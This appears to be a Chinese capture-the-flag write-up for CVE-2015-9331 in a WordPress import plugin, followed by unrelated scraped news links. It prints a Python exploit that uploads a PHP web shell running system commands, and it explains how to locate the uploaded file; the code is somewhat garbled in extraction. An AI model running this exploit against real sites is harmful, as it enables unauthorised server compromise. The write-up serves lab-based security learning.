春秋云镜 CVE-2015-9331 靶场环境Windows10虚拟机点击给的网址会出现这样的画面该主页存在“目录敏感文件泄露”的低危漏洞POCimport requests import os site 你靶场的URL file_to_upload shell.php # 上传恶意文件 up_req requests.post(fhttps://{site}/wp-admin/admin-ajax.php?pagepmxi-admin-settingsactionuploadnameevil.php, dataopen(file_to_upload, rb).read()) # 获取上传文件的目录 up_dir os.popen(fphp -r print md5(strtotime(\{up_req.headers[date]}\));).read() # 构建恶意文件的访问链接 print(fhttps://{site}/wp-content/uploads/wpallimport/uploads/{up_dir}/evil.php)shell.php的内容?php system(cat /flag); phpinfo(); ?ctrlR打开Windows10的终端执行1.py文件复制返回的地址直接粘贴到网站URL栏中跳转获取flag在靶场中遇到的一些问题问题一执行1.py文件的时候终端显示“php不是内部或外部命令 也不是可运行的程序”解决安装PHP网上有安装教程可以自行搜索如果不想安装PHP那么就用下面的方法POCimport requests,os import hashlib from datetime import datetime site你靶场的URL file_to_upload shell.zip up_req requests.post(https://site/wp-admin/admin-ajax.php?pagepmxi-admin- settingsactionuploadnameevil.php,dataopen(file_to_upload,rb).read()) print(up_req.headers[date])shell.zip的内容?php system(cat /flag); phpinfo(); ?CtrlR打开终端执行1.py文件并复制返回的时间网上搜索 “在线PHP执行工具”制造时间戳?php $txt你复制的时间; echo $txt; echo \n; echo strtotime($txt); echo \n; print md5(strtotime($txt)); ?返回网页拼接URL地址进行网页跳转获取flaghttps://你靶场的URL//wp-content/uploads/wpallimport/uploads/复制的MD5值/evil.php问题二最后页面跳转显示报错400并要求协议是https协议而不是http协议因为官方给出的POC中构造的URL就是http协议导致直接400如果强制在URL栏中修改为https那么页面就会返回404解决在POC中直接进行修改将http → https 上面步骤中给出的是修改过后的POC可以放心使用温馨提示文中演示的漏洞攻击手段仅用于授权靶场练习目的是学习漏洞防御知识。未获得授权的网站不允许任何渗透、扫描行为触碰法律红线会承担民事、刑事责任建议大家仅在合规靶场开展学习。

相关新闻

最新新闻

D2DX终极指南:让经典暗黑破坏神2在现代电脑上完美重生

D2DX终极指南:让经典暗黑破坏神2在现代电脑上完美重生

D2DX终极指南:让经典暗黑破坏神2在现代电脑上完美重生 【免费下载链接】d2dx D2DX is a complete solution to make Diablo II run well on modern PCs, with high fps and better resolutions. 项目地址: https://gitcode.com/gh_mirrors/d2/d2dx 还记得那个…

2026/7/19 10:56:56
B站视频下载神器:一键解锁大会员4K和充电专属内容

B站视频下载神器:一键解锁大会员4K和充电专属内容

B站视频下载神器:一键解锁大会员4K和充电专属内容 【免费下载链接】bilibili-downloader B站视频下载,支持下载大会员清晰度4K,持续更新中 项目地址: https://gitcode.com/gh_mirrors/bil/bilibili-downloader 你是否曾为无法保存B站大…

2026/7/19 10:56:56
PySpark数据科学家实战指南:从本地Pandas到集群加速

PySpark数据科学家实战指南:从本地Pandas到集群加速

1. 这不是又一本PySpark入门书——它解决的是数据科学家在真实项目里“卡住”的那个瞬间“PySpark for Data Scientists a New Way Out”这个标题,乍看像本教程,但如果你真在用Pandas处理80GB的用户行为日志时遭遇OOM(Out of Memory&#xff…

2026/7/19 10:56:56
如何利用面试鸭开源题库系统高效备战技术面试:2026年实战指南

如何利用面试鸭开源题库系统高效备战技术面试:2026年实战指南

如何利用面试鸭开源题库系统高效备战技术面试:2026年实战指南 【免费下载链接】mianshiya-public 持续维护的企业面试题库网站,帮你拿到满意 offer!⭐️ 2026年最新Java面试题、前端面试题、AI大模型面试题、AI Agent面试题、RAG面试题、C面试…

2026/7/19 10:56:56
TI AM275x CPSW3 Port 0寄存器配置实战:EEE节能与PFC流控详解

TI AM275x CPSW3 Port 0寄存器配置实战:EEE节能与PFC流控详解

1. 项目概述与核心价值如果你正在基于TI的AM275x这类高性能处理器开发网络设备,并且需要对底层的以太网交换子系统进行精细化的控制和性能调优,那么你大概率绕不开对CPSW3(Common Platform Ethernet Switch)模块的寄存器级编程。尤…

2026/7/19 10:56:56
Fargate CLI扩展开发:如何为工具添加自定义命令的完整指南

Fargate CLI扩展开发:如何为工具添加自定义命令的完整指南

Fargate CLI扩展开发:如何为工具添加自定义命令的完整指南 【免费下载链接】fargatecli CLI for AWS Fargate 项目地址: https://gitcode.com/gh_mirrors/fa/fargatecli AWS Fargate CLI是一个强大的命令行工具,用于在AWS Fargate上部署和管理容器…

2026/7/19 10:51:56

月新闻